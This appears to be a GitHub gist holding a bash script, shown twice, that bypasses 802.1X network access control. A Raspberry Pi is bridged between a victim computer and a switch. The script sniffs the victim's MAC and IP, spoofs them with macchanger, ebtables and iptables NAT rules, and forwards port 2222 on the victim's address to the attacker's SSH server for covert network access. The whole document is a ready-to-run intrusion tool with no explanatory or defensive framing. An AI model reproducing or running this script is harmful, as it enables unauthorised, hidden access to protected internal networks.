yonasuriv · October 4, 2023 00:01 · yonasuriv · Oct 4, 2023
diff --git a/gistfile1.txt b/gistfile1.txt
 #!/bin/bash
 # Must be run as root!
 # Based on github.com/NACKered/nackered.sh
 #
 # Requires: apt-get install bridge-utils iptables ebtables
 #
 echo "Stopping network manager and dhcp clients"
 dhcpcd -k
 sudo systemctl stop dhcpcd.service

 service network-manager stop
 echo "net.ipv6.conf.all.disable_ipv6 = 1" > /etc/sysctl.conf
 sysctl -p
 echo "" > /etc/resolv.conf
 echo "Ground work done..." 

 ###### THIS BLOCK IS REDUDANT AS THESE VARIABLES ARE AUTOMAGICALLY OBTAINED######
 #SWMAC=		#MAC OF TO SWITCH eth1
 #NEED TO OBTAIN FORM A VICTIM
 #COMPMAC=
 #COMIP=
 #GWNET=
 #DEFGW=
 ###### THIS BLOCK IS REDUDANT AS THESE VARIABLES ARE AUTOMAGICALLY OBTAINED######

 BRINT=br0 #bridge interface
 SWINT=eth1 #interface of pi native interface plugged into switch
 SWMAC=`ifconfig $SWINT | grep -i ether | awk '{ print $2 }'` #get SWINT MAC address automatically.
 COMPINT=eth2 #interface of usb2eth plugged into victim machine
 BRIP=169.254.66.66 #IP for the bridge
 DPORT=2222 #SSH CALL BACK PORT USE victimip:2222 to connect to attackerbox:22
 RANGE=61000-62000 #Ports for my traffic on NAT

 brctl addbr $BRINT #Make bridge
 brctl addif $BRINT $COMPINT #add computer side to bridge
 brctl addif $BRINT $SWINT #add switch side to bridge

 modprobe br_netfilter
 echo 8 > /sys/class/net/br0/bridge/group_fwd_mask #forward EAP packets
 echo 1 > /proc/sys/net/bridge/bridge-nf-call-iptables

 ifconfig $COMPINT 0.0.0.0 up promisc #bring up comp interface
 ifconfig $SWINT 0.0.0.0 up promisc #bring up switch interface

 echo "Bridge Configured."
 echo "Doing MAC swap."

 macchanger -m 00:12:34:56:78:90 $BRINT #Swap MAC of bridge to an initialisation value (not important what)
 macchanger -m $SWMAC $BRINT #Swap MAC of bridge to the switch side MAC

 echo "Bringing up the bridge"
 ifconfig $BRINT 0.0.0.0 up promisc #BRING UP BRIDGE

 #VICTIM MACHINE SHOULD WORK OK AT THIS POINT

 echo "Resetting connection"
 mii-tool -r $COMPINT
 mii-tool -r $SWINT

 echo "Listening for traffic dst tcp 88 or tcp 443"
 tcpdump -i $COMPINT -s0 -w /boot.pcap -c1 tcp dst port 88 or tcp dst port 443 or dst port 53

 echo "Processing packet and setting veriables COMPMAC GWMAC COMIP"
 COMPMAC=`tcpdump -r /boot.pcap -nne -c 1 tcp dst port 88 or tcp dst port 443 or dst port 53 | awk '{print $2","$4$10}' | cut -f 1-4 -d.| awk -F ',' '{print $1}'`
 GWMAC=`tcpdump -r /boot.pcap -nne -c 1 tcp dst port 88 or tcp dst port 443 or dst port 53 | awk '{print $2","$4$10}' |cut -f 1-4 -d.| awk -F ',' '{print $2}'`
 COMIP=`tcpdump -r /boot.pcap -nne -c 1 tcp dst port 88 or tcp dst port 443 or dst port 53 | awk '{print $3","$4$10}' |cut -f 1-4 -d.| awk -F ',' '{print $3}'`

 echo "Going silent"
 arptables -A OUTPUT -j DROP
 iptables -A OUTPUT -j DROP

 echo "Bringing up interface with bridge side IP"
 ifconfig $BRINT $BRIP up promisc

 # Anything leaving this box with the switch side MAC on the switch interface or bridge interface rewrite and give it the victims MAC
 echo "Setting up layer 2 rewrite"
 ebtables -t nat -A POSTROUTING -s $SWMAC -o $SWINT -j snat --to-src $COMPMAC
 ebtables -t nat -A POSTROUTING -s $SWMAC -o $BRINT -j snat --to-src $COMPMAC

 #Create default routes so we can route traffic - all traffic goes to 169.254.66.1 and this traffic gets Layer 2 sent to GWMAC
 echo "Adding default routes"
 arp -s -i $BRINT 169.254.66.1 $GWMAC
 route add default gw 169.254.66.1

 #SSH CALLBACK if we receieve inbound on br0 for VICTIMIP:DPORT forward to BRIP on 22 (SSH)
 echo "Setting up SSH reverse shell inbound on BICTIMIP:2222 to ATTACKERIP:22"
 iptables -t nat -A PREROUTING -i br0 -d $COMIP -p tcp --dport $DPORT -j DNAT --to $BRIP:22

 echo "Setting up layer 3 rewrite rules" 

 #Anything on any protocol leaving OS on BRINT with BRIP rewrite it to COMPIP and give it a port in the range for NAT
 iptables -t nat -A POSTROUTING -o $BRINT -s $BRIP -p tcp -j SNAT --to $COMIP:$RANGE
 iptables -t nat -A POSTROUTING -o $BRINT -s $BRIP -p udp -j SNAT --to $COMIP:$RANGE
 iptables -t nat -A POSTROUTING -o $BRINT -s $BRIP -p icmp -j SNAT --to $COMIP

 echo "Starting local SSH server"

 #START SSH
 /etc/init.d/ssh start

 echo "All setup steps complete; check ports are still lit and operational"

 echo "Re-enabling traffic flow; monitor ports for lockout"
 #Re-enable L2 and L3
 arptables -D OUTPUT -j DROP
 iptables -D OUTPUT -j DROP
 echo
 echo "READY TO ROCK!"
 echo
 echo "- Victim is now bridged - IP/MAC address of victim "lives" on eth0 of the pi but is forwarded transparently"
 echo "- Ínfo for .1x:"
 echo "-- We bridge authentication related comms (.1x EAPOL) towards the victim for answering"
 echo "-- Access is possible from the raspberry pi onto the internal network (eth0) and SSH is available on the configured port"
 echo "-- Victim PC supplicant must be present and succesfully answer EAPOL requests from the switch"
 echo "-- Once victim disconnects, access will be cut by the switch depending on switch config"
 echo
	#!/bin/bash
	# Must be run as root!
	# Based on github.com/NACKered/nackered.sh
	#
	# Requires: apt-get install bridge-utils iptables ebtables
	#
	echo "Stopping network manager and dhcp clients"
	dhcpcd -k
	sudo systemctl stop dhcpcd.service

	service network-manager stop
	echo "net.ipv6.conf.all.disable_ipv6 = 1" > /etc/sysctl.conf
	sysctl -p
	echo "" > /etc/resolv.conf
	echo "Ground work done..."

	###### THIS BLOCK IS REDUDANT AS THESE VARIABLES ARE AUTOMAGICALLY OBTAINED######
	#SWMAC= #MAC OF TO SWITCH eth1
	#NEED TO OBTAIN FORM A VICTIM
	#COMPMAC=
	#COMIP=
	#GWNET=
	#DEFGW=
	###### THIS BLOCK IS REDUDANT AS THESE VARIABLES ARE AUTOMAGICALLY OBTAINED######

	BRINT=br0 #bridge interface
	SWINT=eth1 #interface of pi native interface plugged into switch
	SWMAC=`ifconfig $SWINT \| grep -i ether \| awk '{ print $2 }'` #get SWINT MAC address automatically.
	COMPINT=eth2 #interface of usb2eth plugged into victim machine
	BRIP=169.254.66.66 #IP for the bridge
	DPORT=2222 #SSH CALL BACK PORT USE victimip:2222 to connect to attackerbox:22
	RANGE=61000-62000 #Ports for my traffic on NAT

	brctl addbr $BRINT #Make bridge
	brctl addif $BRINT $COMPINT #add computer side to bridge
	brctl addif $BRINT $SWINT #add switch side to bridge

	modprobe br_netfilter
	echo 8 > /sys/class/net/br0/bridge/group_fwd_mask #forward EAP packets
	echo 1 > /proc/sys/net/bridge/bridge-nf-call-iptables

	ifconfig $COMPINT 0.0.0.0 up promisc #bring up comp interface
	ifconfig $SWINT 0.0.0.0 up promisc #bring up switch interface

	echo "Bridge Configured."
	echo "Doing MAC swap."

	macchanger -m 00:12:34:56:78:90 $BRINT #Swap MAC of bridge to an initialisation value (not important what)
	macchanger -m $SWMAC $BRINT #Swap MAC of bridge to the switch side MAC

	echo "Bringing up the bridge"
	ifconfig $BRINT 0.0.0.0 up promisc #BRING UP BRIDGE

	#VICTIM MACHINE SHOULD WORK OK AT THIS POINT

	echo "Resetting connection"
	mii-tool -r $COMPINT
	mii-tool -r $SWINT

	echo "Listening for traffic dst tcp 88 or tcp 443"
	tcpdump -i $COMPINT -s0 -w /boot.pcap -c1 tcp dst port 88 or tcp dst port 443 or dst port 53

	echo "Processing packet and setting veriables COMPMAC GWMAC COMIP"
	COMPMAC=`tcpdump -r /boot.pcap -nne -c 1 tcp dst port 88 or tcp dst port 443 or dst port 53 \| awk '{print $2","$4$10}' \| cut -f 1-4 -d.\| awk -F ',' '{print $1}'`
	GWMAC=`tcpdump -r /boot.pcap -nne -c 1 tcp dst port 88 or tcp dst port 443 or dst port 53 \| awk '{print $2","$4$10}' \|cut -f 1-4 -d.\| awk -F ',' '{print $2}'`
	COMIP=`tcpdump -r /boot.pcap -nne -c 1 tcp dst port 88 or tcp dst port 443 or dst port 53 \| awk '{print $3","$4$10}' \|cut -f 1-4 -d.\| awk -F ',' '{print $3}'`

	echo "Going silent"
	arptables -A OUTPUT -j DROP
	iptables -A OUTPUT -j DROP

	echo "Bringing up interface with bridge side IP"
	ifconfig $BRINT $BRIP up promisc

	# Anything leaving this box with the switch side MAC on the switch interface or bridge interface rewrite and give it the victims MAC
	echo "Setting up layer 2 rewrite"
	ebtables -t nat -A POSTROUTING -s $SWMAC -o $SWINT -j snat --to-src $COMPMAC
	ebtables -t nat -A POSTROUTING -s $SWMAC -o $BRINT -j snat --to-src $COMPMAC

	#Create default routes so we can route traffic - all traffic goes to 169.254.66.1 and this traffic gets Layer 2 sent to GWMAC
	echo "Adding default routes"
	arp -s -i $BRINT 169.254.66.1 $GWMAC
	route add default gw 169.254.66.1

	#SSH CALLBACK if we receieve inbound on br0 for VICTIMIP:DPORT forward to BRIP on 22 (SSH)
	echo "Setting up SSH reverse shell inbound on BICTIMIP:2222 to ATTACKERIP:22"
	iptables -t nat -A PREROUTING -i br0 -d $COMIP -p tcp --dport $DPORT -j DNAT --to $BRIP:22

	echo "Setting up layer 3 rewrite rules"

	#Anything on any protocol leaving OS on BRINT with BRIP rewrite it to COMPIP and give it a port in the range for NAT
	iptables -t nat -A POSTROUTING -o $BRINT -s $BRIP -p tcp -j SNAT --to $COMIP:$RANGE
	iptables -t nat -A POSTROUTING -o $BRINT -s $BRIP -p udp -j SNAT --to $COMIP:$RANGE
	iptables -t nat -A POSTROUTING -o $BRINT -s $BRIP -p icmp -j SNAT --to $COMIP

	echo "Starting local SSH server"

	#START SSH
	/etc/init.d/ssh start

	echo "All setup steps complete; check ports are still lit and operational"

	echo "Re-enabling traffic flow; monitor ports for lockout"
	#Re-enable L2 and L3
	arptables -D OUTPUT -j DROP
	iptables -D OUTPUT -j DROP
	echo
	echo "READY TO ROCK!"
	echo
	echo "- Victim is now bridged - IP/MAC address of victim "lives" on eth0 of the pi but is forwarded transparently"
	echo "- Ínfo for .1x:"
	echo "-- We bridge authentication related comms (.1x EAPOL) towards the victim for answering"
	echo "-- Access is possible from the raspberry pi onto the internal network (eth0) and SSH is available on the configured port"
	echo "-- Victim PC supplicant must be present and succesfully answer EAPOL requests from the switch"
	echo "-- Once victim disconnects, access will be cut by the switch depending on switch config"
	echo